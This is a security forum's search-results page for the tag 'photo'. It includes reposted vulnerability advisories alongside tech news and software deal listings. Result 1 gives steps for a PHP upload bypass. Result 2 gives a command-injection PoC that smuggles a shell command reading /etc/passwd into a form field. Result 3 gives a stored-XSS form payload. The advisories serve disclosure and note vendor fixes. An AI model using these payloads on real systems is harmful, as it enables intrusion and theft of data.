Jump to content

Search the Community

Showing results for tags 'photo'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 8 results

  1. | # Title : boomchat-v4.2 Upload Vulnerability | # Author : indoushka | # email : indoushka4ever@gmail.com | # Dork : no 4 noob | # Tested on: Win8 fr pro | # Bug : Upload | # Download : www.20script.ir ======================================= 1- register in script 4 chat 2- change photo of profil 3- chang evil from 1.php to 1.php.jpg 4- go to http://127.0.0.1/bmchat/avatar/peter85467529.php Source
  2. ------------------------------------------------------------------------ Command injection vulnerability in Synology Photo Station ------------------------------------------------------------------------ Han Sahin, May 2015 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A command injection vulnerability was found in Synology Photo Station, which allows an attacker to execute arbitrary commands with the privileges of the webserver. An attacker can use this vulnerability to compromise a Synology DiskStation NAS, including all data stored on the NAS. ------------------------------------------------------------------------ Tested version ------------------------------------------------------------------------ This issue was tested on Synology Photo Station version 6.2-2858. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Synology reports that this issue has been resolved in Photo Station version 6.3-2945. https://www.synology.com/en-us/releaseNote/PhotoStation ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20150502/command_injection_vulnerability_in_synology_photo_station.html Proof of concept The following proof of concept copies the /etc/passwd file to /var/services/photo/Securify.txt. <html> <body> <form action="http://<target>/photo/webapi/photo.php" method="POST"> <input type="hidden" name="id" value="photo_536168696e_53637265656e2053686f7420323031352d30352d31302061742032322e33342e33352e706e67" /> <input type="hidden" name="description" value="| cat /etc/passwd > /var/services/photo/Securify.txt " /> <input type="hidden" name="api" value="SYNO.PhotoStation.Photo" /> <input type="hidden" name="method" value="edit" /> <input type="hidden" name="version" value="1" /> <input type="hidden" name="ps_username" value="admin" /> <input type="hidden" name="" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> Sursa: http://dl.packetstormsecurity.net/1505-exploits/synologyphotostation-exec.txt
  3. Advisory ID: HTB23257 Product: WP Photo Album Plus WordPress Plugin Vendor: J.N. Breetvelt Vulnerable Version(s): 6.1.2 and probably prior Tested Version: 6.1.2 Advisory Publication: April 29, 2015 [without technical details] Vendor Notification: April 29, 2015 Vendor Patch: April 29, 2015 Public Disclosure: May 20, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2015-3647 Risk Level: Medium CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered stored XSS vulnerability in WP Photo Album Plus WordPress plugin, which can be exploited to perform Cross-Site Scripting attacks against administrators of vulnerable WordPress installation. An attacker might be able to hijack administrator’s session and obtain full control over the vulnerable website. The vulnerability exists due to the absence of filtration of user-supplied input passed via the "comname" and "comemail" HTTP POST parameters to "/wp-content/plugins/wp-photo-album-plus/wppa-ajax-front.php" script when posting a comment. A remote attacker can post a specially crafted message containing malicious HTML or script code and execute it in administrator’s browser in context of the vulnerable website, when administrator views images or comments in administrative interface. A simple exploit below will store JS code in the WP database and display a JS popup window with "ImmuniWeb" word every time the administrator views comments or images: <form action="http://[host]/wp-content/plugins/wp-photo-album-plus/wppa-ajax-front.php" method="post" name="main"> <input type="hidden" name="action" value='wppa'> <input type="hidden" name="wppa-action" value='do-comment'> <input type="hidden" name="photo-id" value='2'> <input type="hidden" name="comment" value='1'> <input type="hidden" name="moccur" value='1'> <input type="hidden" name="comemail" value='"><script>alert(/ImmuniWeb/);</script>'> <input type="hidden" name="comname" value='"><script>alert(/ImmuniWeb/);</script>'> <input type="submit" id="btn"> </form> The code will be automatically executed, when the administrator visits one of the following pages: http://[host]/wp-admin/admin.php?page=wppa_manage_comments http://[host]/wp-admin/admin.php?page=wppa_moderate_photos ----------------------------------------------------------------------------------------------- Solution: Update to WP Photo Album Plus 6.1.3 More Information: https://wordpress.org/plugins/wp-photo-album-plus/changelog/ ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23257 - https://www.htbridge.com/advisory/HTB23257 - Stored Cross-Site Scripting (XSS) in WP Photo Album Plus WordPress Plugin. [2] WP Photo Album Plus WordPress plugin - https://wordpress.org/plugins/wp-photo-album-plus/ - This plugin is designed to easily manage and display your photos, photo albums, slideshows and videos in a single as well as in a network WP site. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. Surs?: http://dl.packetstormsecurity.net/1505-exploits/wpphotoalbumplus612-xss.txt
  4. If you have enabled automatic Facebook Photo Sync feature on your iPhone, iPad or Android devices, then Beware! Hackers can steal your personal photographs without your knowledge. In 2012, the social network giant introduced Facebook Photo Sync feature for iPhone, iPad and Android devices which, if opt-in, allows Facebook to automatically sync all your photos saved on your mobile device with your Facebook account. The photos that you have synced from your phone are automatically uploaded in the background to a private Facebook album, which is not visible to any of your Facebook friends or other Facebook users. However, you may can choose then to share photos from the album on your Facebook timeline or send them as a message to a friend. A bug bounty hunter, Laxman Muthiyah, discovered a critical flaw in the Facebook Photo Sync feature and Facebook API that could allow any third-party app to access your personal photos from the hidden Facebook Photo Sync album. It's something that reminds me of "The Fappenings" and "The Snappening" -- in which nude and personal photographs of top celebrities were leaked due to a security flaw in Apple's iCloud file storage service and unofficial Snapchat messaging service app, respectively. In a blog post published today, Laxman explained that the vulnerability resides in the privilege mechanism that which applications are allowed to access sync photos using vaultimages API. Technically, Synced private photo album should be accessible by only Facebook's official app, but the vulnerability allows any 3rd party apps to get permission to read your personal synced photos. Laxman previously disclosed a vulnerability in Facebook Graph API mechanism that allowed him to delete any photo album on Facebook owned by any user, any page or any group. HOW TO DISABLE AUTO-SYNC Though, Facebook has patched the vulnerability reported by Laxman and rewarded him with $10,000 under it’s bug bounty program, Facebook users are advised to turn off Facebook Photo Sync feature just to be on the safer side. In order to do so, just go to Facebook mobile app menu, scroll down and select Account > App Settings > Sync Photos, then Choose 'Don't sync my photos.' Source
  5. Product Description The top 1 watermark software, provide professional image protection solutions for your online photos. How Do You Know that Your Photos Are Secure? If you are sharing your photos on the internet, you are at the risk of losing them. Someone would take the photos for their own using, or malicious revised, you might never even know. Watermark Software is professional watermarking program for protecting online photo’s copyright. It can add text watermark, image watermark, logo and signature to photos without unauthorized using. Watermark Software also supports batch mode. And the process of adding watermark to 500 pictures will be in less than 1 minute. Text Watermark A common way to protect images with adding your name, nickname, signature, date to photo. Image Watermark Allows you to add image to preventing others from removing watermark and stealing photo. There are lot of free watermarks Pretty Frames Watermark Software provides many picture frames that you can add and edit the frames to retouch your photo at your will. Make QR Code as Watermark A QR code is a square black pattern like a Barcode which contains encoded information and can be scanned to read that information. Watermark Software allows you put QR code as watermark on you photo to show more extended information. EXIF Editor It’s invisible watermark embed your image file, also a strong proof of copyright Watermark tiling for strong protection For some special purposes, you need to protect your shared photos to avoid copy and unauthorized using. However, we can’t prevent from the reproduction and dissemination on the internet. Tiled watermark provides the strong protection for your photo display. Photo Resize Two modes Pixel and Percentage for various photo sizes, optimize the quality automatically Batch Rename Powerful template let you rename hundreds of files immediately Photo Cropping Removing unwanted area of photo, enlarge the important area of photo and make your photo smaller than original Support All of Photo Formats Add photos with different formats to watermark software, it will process them at once Amazing Batch Process Speed – Faster Than Ever Still waste a whole day to add watermark to batches of photos? Get free again with Watermark Software! - High Efficiency – Batch Watermark / Batch Resize / Batch Rename / Batch Editing and more; - Top speed – Watermark all your travel, party photos in one operation, batch watermark over 300 photos within 1 minute; - Smart fit – Intelligently adjust watermark’s size/place to fit different size/format pictures; Create Customized Templates for Fast Watermarking We are tired of doing the same thing repeatedly! Your own custom watermark style can be saved as template in your computer, just load the template to restore your watermark project. No need to waste your precious time to do it again. Exclusive Feature – Upload all of processed images to your web server automatically via FTP. Simplify your job – If you want to add watermark to 500 photos for your website/blog/online storage, just run Watermark Software and then enjoy a cup of coffee, everything will be done when you get back. Product Homepage Here -> Download <-Deal Expires in: EXPIRED!
  6. Product Description 40% Discount on Zoner Photo Studio 16 Pro! Best graphic software 2014. What’s new in Zoner Photo Studio 16? Now with Touch Control Zoner Photo Studio is the first free photo edit software with Touch Controls. Find, edit, show and share images faster than ever. Bring those same Touch Control motions that you use on your smartphone and tablet to your PC! Cycle through photos with just a flick of the finger Zoom in and out using pinch actions Select desired files or retouch options with a single tap Editing—Faster and Easier Than Ever What You Want In One Place Stop spending time hunting through pull-down edit option bars to locate what you want. The Editor now displays all functions in a Quick Edits pane on the right hand side of the workspace. Easy-to-use sliders deliver instant results. Geotag Photos to Maps See Where You’ve Been Click on a photo, drag it to a map, and Zoner Photo Studio creates a virtual pushpin that automatically adds a Geotag to the file and places it on the map. Have a camera that already Geotags your photos? Those tags will be visible when you import them into Zoner Photo Studio. Geotags also display in Zonerama album photos. Content-Aware Resizing Intelligent Photo Composition Wish to change a photo’s composition or size without shrinking or cropping key elements? New for version 16 is Content-Aware resizing and the ability to adjust only areas you designate. Use to: bring two people side-by-side make narrow an object that’s too wide improve overall balance and proportion Automatic Facebook Sharing From Zonerama to Social Media Sharing If you upload photos to both Zonerama albums and Facebook, you now have seamless integration between the two. No more uploading twice! Pick one and photos appear in both places IMPORT Import now also allows moving files from camera/card instead of copying them Improved detection of already-downloaded photos Automatic notification when a device is newly connected MANAGER Manager now has four modes—Browser, Preview, Map, and Compare Viewer—photo viewing; quick 1:1 detail checking/easy access to zoom Map—offers GPS tagging by dragging pictures onto a map; shows shot locations of all pictures in current folder Compare—for visually comparing up to four photos, including synchronized panning/zooming Navigator—now uses sections instead of tabs, for quicker navigation RAW+JPEG—RAW+JPEG file pairs can now be grouped for easier management Keywords pane—easier keyword drag and drop: onto multiple selected files, onto the Preview, onto individual pictures in Compare Folder synchronization—new settings for fine-tuning synchronization and for how folder comparison results are shown Background synchronization—new configurable synchronization tasks and scheduled running of these tasks in the background even when ZPS is not running Catalog—new display options: Last 7 days, Last 30 days EDITING FILTERS New Content-aware Resize—resizing of a picture that takes its contents into account and preserves the most important parts of the picture (e.g. a person) while shrinking the less important parts (e.g. the sky). Editing filters are no longer windows—their settings are in the Side Panel, and they now have the same look and feel as the rest of ZPS Place Text, Place Image—new watermarking option Envelopes—new Frames category VIEWER Filmstrip—now offers easy folder navigation Quick 1:1 viewing and smooth zooming EDITOR Settings for all tools and editing filters are now in the Side Panel. Everything now works and looks the same way, and settings are easier to reach. Side Panel can now be placed on either the right or the left. Quick Filters—new filters and frames New “Place Line” tool—for quickly drawing lines onto pictures Place Image, Place Text, etc. tools—previews for saved layer-effect settings (e.g. shadow, outline, etc.) and quick application of these effects Place Shape tool now offers previews of shapes Filmstrip—now offers easy navigation of folders RAW Pictures are shown and refreshed more quickly, at better quality, and with lower memory demands. GENERAL Improved support for devices with touch controls Improved display support for high-DPI display devices Hardware acceleration for display of previews in Preview mode and in the Viewer—smoother display and zooming GPU acceleration—two more operations can now be accelerated: rotation and horizon leveling Other interface improvements -> Download <-Deal Expires in: EXPIRED! Click Here to Get 45% Discount Coupon on Zoner Photo Studio 17 Pro
  7. Last week, the most popular mobile messaging application WhatsApp finally arrived on the web — dubbed WhatsApp Web, but unfortunately it needs some improvements in its web version. An independent 17-year-old security researcher Indrajeet Bhuyan reported two security holes in the WhatsApp web client that in some way exposes its users’ privacy. Bhuyan called the first hole, WhatsApp photo privacy bug and the other WhatsApp Web Photo Sync Bug. Bhuyan is the same security researcher who reported us the vulnerability in the widely popular mobile messaging app which allowed anyone to remotely crash WhatsApp by sending a specially crafted message of just 2kb in size, resulting in the loss of conversations. Whatsapp Photo Privacy Bug According to him, the new version of WhatsApp Web allows us to view a user’s profile image even if we are not on the contact list of that user. Even if the user has set the profile image privacy setting to "Contacts Only," the profile picture can be viewed by out of contacts people as well. Basically, if we set the profile image privacy to Contacts Only, only the people in our contact list are able to view our profile picture, and nobody else. But, this is not in the case of WhatsApp Web. You can watch how this works in the video demonstration below: WhatsApp Web Photo Sync Bug The second security hole points out the WhatsApp Web Photo Syncing functionality. Bhuyan noticed that whenever a user deletes a photo that was sent via the mobile version of WhatsApp application, the photo appears blurred and can’t be viewed. However, the same photo, which has already been deleted by the user from mobile WhatsApp version, can be accessible by Whatsapp Web as the photo does not get deleted from its web client, revealing the fact that mobile and web clients of the service are not synced properly. You can also watch the video demonstration on this as well: This is no surprise, as WhatsApp Web introduced just a couple of days before and these small security and implementation flaws could be expected at this time, as well as some other bugs could also be revealed in the near future. However, the company will surely fix the issues and will definitely make its users’ messaging experience secure. As partnered with Open Whisper Systems, WhatsApp recently made end-to-end encryption a default feature on Android platform, stepping a way forward for the online privacy of its users around the world. -> Source: 17-Year-Old Found Bugs in WhatsApp Web and Mobile App - Hacker News
  8. Salutare. Va prezint o parte din creatiile mele. Asteptati pana se incarca Animatiile merg cu incetinitorul pentru ca sunt multe. Lucrarile sunt facute in Photoshop si After Effects. Scuzati-ma de dublu post. Exista o limita de imagini/post. //
×
×
  • Create New...